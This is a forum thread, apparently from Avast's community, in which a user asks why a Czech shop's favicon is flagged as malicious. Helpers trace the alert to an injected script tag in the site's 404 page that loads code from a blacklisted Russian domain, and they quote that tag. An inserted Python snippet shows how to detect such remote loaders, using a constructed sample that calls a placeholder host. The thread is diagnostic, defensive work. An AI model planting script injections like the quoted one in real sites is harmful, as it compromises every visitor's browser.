HTML:Script-inf in website icon?

Hello. It happened before on another website, and now on this one, as the following detection pop-up shows:

Object: hxxp://www.zendl.cz/favicon.ico

Infection: HTML:Script-inf

Is it possible to infect website icon with a virus? VirusTotal analyses the website with 2 detections out of 64 as shown here: https://virustotal.com/cs/url/5c99b1fe2a847e03529823be42ccd3736300052907f1545e5ecc27fa7f70b429/analysis/1490696307/

It’s a Czech military and hunting goods shopping website. Could anyone please inspect it for false positives? I can’t believe a website icon can be infected by malware. Thank you.

https://sitecheck.sucuri.net/results/www.zendl.cz/favicon.ico

Malware entry: MW:BLACKLISTED:35
A suspicious code was identified loading content from a blacklisted domain

Malware entry: MW:BLK:2
The web site contains a remote javascript or iframe that is currently blacklisted.

Also being flagged by Google Safebrowsing: Flagged URLs found in: -http://www.zendl.cz/favicon.ico

1: -http://psy-ufa.ru/wp-includes/images/wlw/1/404.php → Google Safe Browsing diagnostic page for this URL

Advisory provided by Google

If your page is loading content, images or scripts, from a site that is currently being flagged as suspicious by Google, it will generate a malware warning – even if your site is not currently being flagged. About your only option is to remove that content until the site owners can get their site cleaned up and the warning removed.

10:
< sc​ript type=“text/javasc​ript” src=" hxtp://psy-ufa dot ru/wp-includes/images/wlw/1/4O4.php "> < /sc​ript>

Note: The sc​ript call above looks suspicious! It loads content from a flagged site.

polonus
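As an added example (not code from this thread or from any of the scanners quoted above), the check those tools performed reduces to: a response that should have been an image is actually HTML, it pulls a script or iframe from a host other than the site itself, and that host is on a blocklist. The 404 body and the blocklist below are constructed for the example; the host name in them is a placeholder, not the domain from the thread.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: what a server might return for /favicon.ico when the file
# is missing and the site's 404 page has been tampered with. The host
# "blacklisted-host.example" is a placeholder, not the domain from the thread.
SAMPLE_404_BODY = b"""<html><head><title>404 Not Found</title>
<script type="text/javascript" src="/js/site.js"></script>
<script type="text/javascript" src="http://blacklisted-host.example/wp-includes/images/wlw/1/404.php"></script>
</head><body><h1>Not Found</h1>
<iframe src="https://cdn.partner.example/widget" width="1" height="1"></iframe>
</body></html>"""

# Constructed blocklist standing in for a Safe Browsing / Sucuri lookup.
BLOCKLIST = {"blacklisted-host.example"}

class RemoteLoaderExtractor(HTMLParser):
    """Collect the src attribute of every <script> and <iframe> tag."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            for name, value in attrs:
                if name == "src" and value:
                    self.sources.append(value.strip())

def looks_like_image(body: bytes) -> bool:
    """True if the body starts with a known favicon magic number (ICO or PNG)."""
    return body.startswith(b"\x00\x00\x01\x00") or body.startswith(b"\x89PNG\r\n\x1a\n")

def audit_favicon_response(site_host: str, body: bytes, blocklist=BLOCKLIST) -> dict:
    """Report third-party hosts the response loads from and which are blocklisted."""
    if looks_like_image(body):
        return {"is_image": True, "third_party": [], "blocklisted": []}
    parser = RemoteLoaderExtractor()
    parser.feed(body.decode("utf-8", errors="replace"))
    third_party, flagged = [], []
    for src in parser.sources:
        host = urlparse(src).hostname  # None for relative URLs, i.e. first-party
        if host and host.lower() != site_host.lower():
            third_party.append(host.lower())
            if host.lower() in blocklist:
                flagged.append(host.lower())
    return {"is_image": False, "third_party": third_party, "blocklisted": flagged}

if __name__ == "__main__":
    print(audit_favicon_response("www.zendl.cz", SAMPLE_404_BODY))
```

A real check would fetch the URL with a plain HTTP client first; the point here is that the scanner's verdict is driven by the 404 page's content, not by the icon file at all.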

SUSPICIOUS >> http://www.UnmaskParasites.com/security-report/?page=www.zendl.cz/favicon.ico

Iframe seems to go here > psy-ufa.ru/
https://virustotal.com/en/url/6f2c38ce642975c218140be104f9fdc2ea978d3eaa24c906c327db93cd51c948/analysis/1490702235/

Sucuri > https://sitecheck.sucuri.net/results/psy-ufa.ru
This specific URL was identified in malicious campaigns to disseminate malware.

Well we have that all explained then. Confirmed here: https://urlscan.io/result/163c9bcc-7b91-491a-8634-bafcbd5cc3e5#summary

Furthermore from the response header we see exploitability like this:
http://forums.interworx.com/threads/8505-A-security-vulnerability-has-been-found-in-mod_watch

OpenSSH 5.1p1 Debian 5 (protocol 2.0) is also open to vulnnlImage hacking it seems (shellcode) and “mod_fastcgi/”,“2.4.6” seems outdated. So it certainly is in need of some ‘hardening’ there, to get it somewhat more secure against hackers.

pol

Guys, no need to dig deeper here. The site is infected, that’s it.

They could get somewhat more secure while they will find the Avast Prague headquarters round the corner, two hops on the metro… ;D
Not digging deeper, just good and sound advice. :wink: ;D

polonus

You know us, we like digging all the way down ;D

Yeah I know, keep up the good work guys…!! :slight_smile: 8)

I don’t understand that. Why does it detect malware in a website icon? It appears it’s not present. Does the 404 page (loaded automatically when some link seems unreachable) contain malware? Looks like hacked websites. Should I contact the webmaster to make him clean his sites and make them safer?

There is a link to a malicious domain, see here >> https://forum.avast.com/index.php?topic=199705.msg1381539#msg1381539

Yes, you may contact the website owner, and you may give him a link to this topic.

Okay, website owner contacted. Hope he will start fixing the issue soon :slight_smile: Thank you for help :slight_smile:

You’re welcome.